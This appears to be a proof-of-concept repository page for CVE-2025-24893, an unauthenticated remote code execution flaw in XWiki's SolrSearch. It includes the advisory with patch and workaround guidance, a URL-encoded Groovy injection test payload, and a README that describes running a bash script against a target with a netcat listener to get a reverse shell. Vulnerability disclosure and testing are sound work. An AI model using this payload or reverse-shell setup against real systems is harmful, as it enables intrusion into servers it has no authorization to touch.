CVE-2025-24893 PoC — Remote code execution as guest via SolrSearchMacros request in xwiki

Title:Remote code execution as guest via SolrSearchMacros request in xwiki (CVE-2025-24893)
Description:XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Any guest can perform arbitrary remote code execution through a request to `SolrSearch`. This impacts the confidentiality, integrity and availability of the whole XWiki installation. To reproduce on an instance, without being logged in, go to `<host>/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28"Hello%20from"%20%2B%20"%20search%20text%3A"%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20`. If there is an output, and the title of the RSS feed contains `Hello from search text:42`, then the instance is vulnerable. This vulnerability has been patched in XWiki 15.10.11, 16.4.1 and 16.5.0RC1. Users are advised to upgrade. Users unable to upgrade may edit `Main.SolrSearchMacros` in `SolrSearchMacros.xml` on line 955 to match the `rawResponse` macro in `macros.vm#L2824` with a content type of `application/xml`, instead of simply outputting the content of the feed.

Bash POC script for RCE vulnerability in XWiki Platform

# CVE-2025-24893
Bash POC script for RCE vulnerability in XWiki Platform  
### Example usage:
Setup a netcat listener:
```
$ nc -nvlp <Port>
```
Then run the script:
```
$ ./cve.sh <Target URL> <Listener IP> <Port>
```
### Affected versions:  
- From 5.4 up to 15.10.11
- From 16.0.0 up to 16.4.1
### Disclamer
This tool is for educational purposes only. I hold no responsibility for any misuse.

 [4.0K]  /data/pocs/9c1aa1a799fd329f132c942e030ab13e9bf62f74
├── [ 778]  cve.sh
├── [1.0K]  LICENSE
└── [ 395]  README.md

0 directories, 3 files